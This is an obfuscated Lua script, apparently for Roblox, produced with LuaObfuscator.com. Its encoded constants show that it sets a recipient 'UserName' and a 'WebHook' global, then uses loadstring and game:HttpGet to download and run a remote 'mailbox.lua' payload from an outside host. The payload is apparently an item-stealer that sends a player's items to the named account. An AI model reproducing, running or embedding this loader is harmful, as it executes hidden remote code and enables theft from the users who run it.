--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.17) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v77=0;local v78;while true do if (v77==1) then return v78;end if (v77==0) then v78=v5(v69,v19);v19=nil;v77=1;end end else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=0 -0 ;local v71;while true do if ((0 -(0 + 0))==v70) then v71=(v31/((3 -1)^(v32-(2 -1))))%(2^(((v33-1) -(v32-(620 -(555 + 64)))) + (932 -((1734 -(282 + 595)) + 74)))) ;return v71-(v71%(569 -(367 + 201))) ;end end else local v72=0;local v73;while true do if ((927 -((304 -90) + 713))==v72) then v73=((1066 -(68 + 997)) + (1271 -(226 + 1044)))^(v32-1) ;return (((v31%(v73 + v73))>=v73) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==(957 -(892 + 65))) then v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + ((183 -(67 + 113)) -(1 + 0)) ;v35=4 -3 ;end if (v35==(118 -(32 + 85))) then return (v37 * (251 + 5)) + v36 ;end end end local function v23()local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(997 -(915 + (178 -96)))) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (9 -5) ;v38=1 + 0 ;end if (v38==((1 + 2) -2)) then return (v42 * (16778168 -(802 + 150))) + (v41 * (176444 -110908)) + (v40 * (464 -(369 -161))) + v39 ;end end end local function v24()local v43=v23();local v44=v23();local v45=1 + 0 ;local v46=(v20(v44,792 -(368 + 423) ,(226 -164) -42 ) * ((20 -(10 + (28 -20)))^((981 -(814 + 45)) -90))) + v43 ;local v47=v20(v44,463 -((1024 -608) + 26) ,98 -67 );local v48=((v20(v44,14 + 18 )==(1 -0)) and  -(439 -(145 + 293))) or ((24 + 407) -(44 + 386)) ;if (v47==(1486 -(998 + 488))) then if (v46==(0 + 0 + 0)) then return v48 * (0 + 0) ;else v47=1;v45=0;end elseif (v47==(2819 -(201 + 571))) then return ((v46==(885 -(261 + 624))) and (v48 * ((1 -0)/0))) or (v48 * NaN) ;end return v8(v48,v47-(2161 -((1196 -(1020 + 60)) + 1022)) ) * (v45 + (v46/((8 -6)^(31 + 21)))) ;end local function v25(v49)local v50=1423 -(630 + 793) ;local v51;local v52;while true do if (v50==(6 -4)) then v52={};for v79=4 -3 , #v51 do v52[v79]=v2(v1(v3(v51,v79,v79)));end v50=2 + (3 -2) ;end if (v50==(0 -0)) then v51=nil;if  not v49 then v49=v23();if (v49==(1747 -(760 + 9 + 978))) then return "";end end v50=(1503 + 411) -(1789 + 124) ;end if (v50==(769 -(745 + 21))) then return v6(v52);end if ((1 + 0)==v50) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=5 -3 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(1 + 1)) then v58=nil;v59=nil;v53=5 -2 ;end if (v53~=0) then else v54=0;v55=nil;v53=1;end if (v53~=3) then else v60=nil;v61=nil;v53=4;end if (v53~=1) then else v56=nil;v57=nil;v53=1276 -(388 + 886) ;end if (v53~=(5 -1)) then else while true do if (v54~=(1 + 1)) then else v59=nil;v60=nil;v54=563 -(306 + 254) ;end if (v54==(1 + 0)) then v57=nil;v58=nil;v54=2;end if (v54~=3) then else v61=nil;while true do local v99=0 -0 ;while true do if (v99==(1468 -(899 + 568))) then if (v55~=(0 + 0)) then else v56={};v57={};v58={};v59={v56,v57,nil,v58};v55=1;end break;end if ((603 -(268 + 335))==v99) then if (v55==2) then for v106=291 -(60 + 230) ,v23() do local v107=572 -(426 + 146) ;local v108;while true do if ((0 + 0)==v107) then v108=v21();if (v20(v108,1,1)==0) then local v162=1456 -(282 + 1174) ;local v163;local v164;local v165;local v166;local v167;while true do if (v162==2) then v167=nil;while true do if (v163==0) then local v189=0;while true do if (v189~=1) then else v163=812 -(569 + 242) ;break;end if (v189~=(0 -0)) then else v164=0;v165=nil;v189=1;end end end if (v163==(1 + 1)) then while true do if (v164==(1024 -(706 + 318))) then local v192=0;while true do if (v192~=(1251 -(721 + 530))) then else local v203=0;local v204;while true do if (v203==0) then v204=1271 -(945 + 326) ;while true do if (v204~=1) then else v192=2 -1 ;break;end if (v204==(0 + 0)) then local v207=0;while true do if (v207==(700 -(271 + 429))) then v165=v20(v108,2 + 0 ,3);v166=v20(v108,1504 -(1408 + 92) ,6);v207=1;end if (v207==1) then v204=1;break;end end end end break;end end end if ((1087 -(461 + 625))~=v192) then else v164=1;break;end end end if (v164~=(1291 -(993 + 295))) then else if (v20(v166,1 + 2 ,1174 -(418 + 753) )~=(1 + 0)) then else v167[1 + 3 ]=v61[v167[4]];end v56[v106]=v167;break;end if (v164==2) then local v194=0 + 0 ;local v195;while true do if (v194==0) then v195=0;while true do if (v195==(1 + 0)) then v164=3;break;end if (v195~=0) then else local v205=0;while true do if (v205~=1) then else v195=1;break;end if (v205~=(529 -(406 + 123))) then else local v208=1769 -(1749 + 20) ;while true do if (v208==1) then v205=1;break;end if (v208==0) then if (v20(v166,1,1 + 0 )~=(1323 -(1249 + 73))) then else v167[2]=v61[v167[2]];end if (v20(v166,1 + 1 ,1147 -(466 + 679) )~=(2 -1)) then else v167[8 -5 ]=v61[v167[1903 -(106 + 1794) ]];end v208=1;end end end end end end break;end end end if (v164==(1 + 0)) then local v196=0 + 0 ;local v197;while true do if (v196==(0 -0)) then v197=0 -0 ;while true do if (v197==0) then local v206=0;while true do if ((114 -(4 + 110))~=v206) then else v167={v22(),v22(),nil,nil};if (v165==(1427 -(41 + 1386))) then local v209=0;local v210;local v211;local v212;while true do if (v209==0) then v210=0;v211=nil;v209=1;end if (v209==(104 -(17 + 86))) then v212=nil;while true do if ((1 + 0)==v210) then while true do if (v211==(0 -0)) then v212=0 -0 ;while true do if (v212==0) then v167[3]=v22();v167[4]=v22();break;end end break;end end break;end if ((166 -(122 + 44))==v210) then local v219=0 -0 ;while true do if (v219==0) then v211=0 -0 ;v212=nil;v219=1 + 0 ;end if ((1 + 0)~=v219) then else v210=1;break;end end end end break;end end elseif (v165==(1 -0)) then v167[3]=v23();elseif (v165==2) then v167[68 -(30 + 35) ]=v23() -((2 + 0)^(1273 -(1043 + 214))) ;elseif (v165==(11 -8)) then local v220=0;local v221;local v222;while true do if (0==v220) then v221=1212 -(323 + 889) ;v222=nil;v220=2 -1 ;end if ((581 -(361 + 219))~=v220) then else while true do if (v221==0) then v222=320 -(53 + 267) ;while true do if (v222==0) then v167[1 + 2 ]=v23() -(2^16) ;v167[4]=v22();break;end end break;end end break;end end end v206=1;end if (v206~=(414 -(15 + 398))) then else v197=1;break;end end end if (v197~=(983 -(18 + 964))) then else v164=7 -5 ;break;end end break;end end end end break;end if (v163==1) then local v190=0;while true do if (v190~=(0 + 0)) then else v166=nil;v167=nil;v190=1;end if (v190==1) then v163=2;break;end end end end break;end if (v162~=1) then else v165=nil;v166=nil;v162=2 + 0 ;end if (v162==0) then v163=850 -(20 + 830) ;v164=nil;v162=1 + 0 ;end end end break;end end end for v109=1,v23() do v57[v109-(127 -(116 + 10)) ]=v28();end return v59;end if (1==v55) then local v104=0;local v105;while true do if (v104==0) then v105=0 + 0 ;while true do if (0~=v105) then else local v168=738 -(542 + 196) ;while true do if (v168~=(0 -0)) then else v60=v23();v61={};v168=1;end if (v168~=1) then else v105=1;break;end end end if ((1 + 1)==v105) then v55=2;break;end if (v105==1) then local v169=0 + 0 ;while true do if (v169==(1 + 0)) then v105=4 -2 ;break;end if ((0 -0)==v169) then for v182=1552 -(1126 + 425) ,v60 do local v183=0;local v184;local v185;local v186;while true do if (v183~=0) then else local v191=405 -(118 + 287) ;while true do if (v191==1) then v183=3 -2 ;break;end if ((1121 -(118 + 1003))~=v191) then else v184=0 -0 ;v185=nil;v191=1;end end end if (v183==(378 -(142 + 235))) then v186=nil;while true do if (1==v184) then if (v185==(4 -3)) then v186=v21()~=(0 + 0) ;elseif (v185==(979 -(553 + 424))) then v186=v24();elseif (v185~=(5 -2)) then else v186=v25();end v61[v182]=v186;break;end if (v184==(0 + 0)) then local v199=0;local v200;while true do if (v199==(0 + 0)) then v200=0;while true do if (v200~=0) then else v185=v21();v186=nil;v200=1 + 0 ;end if (v200~=(1 + 0)) then else v184=1 + 0 ;break;end end break;end end end end break;end end end v59[3]=v21();v169=2 -1 ;end end end end break;end end end v99=1;end end end break;end if (v54~=0) then else local v98=0;while true do if (v98==0) then v55=0;v56=nil;v98=2 -1 ;end if (v98==1) then v54=1;break;end end end end break;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (v65==1) then v68=v62[3];return function(...)local v81=v66;local v82=v67;local v83=v68;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do v93=v81[v85];v94=v93[1];if (v94<=11) then if (v94<=5) then if (v94<=2) then if (v94<=0) then v91[v93[2]]=v93[3]~=0 ;elseif (v94==1) then local v119=0;local v120;while true do if (v119==0) then v120=v93[2];v91[v120]=v91[v120](v13(v91,v120 + 1 ,v86));break;end end else local v121=v93[2];local v122=v91[v93[3]];v91[v121 + 1 ]=v122;v91[v121]=v122[v93[4]];end elseif (v94<=3) then local v112=0;local v113;local v114;while true do if (v112==1) then v91[v113 + 1 ]=v114;v91[v113]=v114[v93[4]];break;end if (v112==0) then v113=v93[2];v114=v91[v93[3]];v112=1;end end elseif (v94==4) then if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v64;else v91[v93[2]]=v64[v93[3]];end else local v126=0;local v127;local v128;local v129;local v130;while true do if (v126==2) then for v176=v127,v86 do local v177=0;while true do if (0==v177) then v130=v130 + 1 ;v91[v176]=v128[v130];break;end end end break;end if (1==v126) then v86=(v129 + v127) -1 ;v130=0;v126=2;end if (0==v126) then v127=v93[2];v128,v129=v84(v91[v127](v13(v91,v127 + 1 ,v93[3])));v126=1;end end end elseif (v94<=8) then if (v94<=6) then for v117=v93[2],v93[3] do v91[v117]=nil;end elseif (v94==7) then do return;end else local v131=0;local v132;while true do if (v131==0) then v132=v93[2];v91[v132]=v91[v132](v13(v91,v132 + 1 ,v86));break;end end end elseif (v94<=9) then v91[v93[2]]=v93[3]~=0 ;elseif (v94>10) then v91[v93[2]]=v93[3];else for v155=v93[2],v93[3] do v91[v155]=nil;end end elseif (v94<=17) then if (v94<=14) then if (v94<=12) then if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v64;else v91[v93[2]]=v64[v93[3]];end elseif (v94==13) then v91[v93[2]]();else v91[v93[2]]=v93[3];end elseif (v94<=15) then v91[v93[2]]();elseif (v94==16) then v85=v93[3];else local v141=0;local v142;local v143;local v144;local v145;while true do if (0==v141) then v142=v93[2];v143,v144=v84(v91[v142](v13(v91,v142 + 1 ,v93[3])));v141=1;end if (v141==1) then v86=(v144 + v142) -1 ;v145=0;v141=2;end if (v141==2) then for v178=v142,v86 do v145=v145 + 1 ;v91[v178]=v143[v145];end break;end end end elseif (v94<=20) then if (v94<=18) then v85=v93[3];elseif (v94>19) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94<=21) then do return;end elseif (v94==22) then v64[v93[3]]=v91[v93[2]];else v64[v93[3]]=v91[v93[2]];end v85=v85 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D6503143O007369796168676979656E67656E637974362O333503073O00576562482O6F6B035O00233O00120E3O00014O0006000100013O0026143O0002000100010004103O0002000100120E000100013O00261400010010000100020004103O00100001001204000200033O001204000300043O00200300030003000500120E000500064O0009000600014O0005000300064O000100023O00022O000D0002000100010004103O0022000100261400010005000100010004103O0005000100120E000200013O0026140002001A000100010004103O001A000100120E000300083O001216000300073O00120E0003000A3O001216000300093O00120E000200023O00261400020013000100020004103O0013000100120E000100023O0004103O000500010004103O001300010004103O000500010004103O002200010004103O000200012O00073O00017O00",v9(),...);
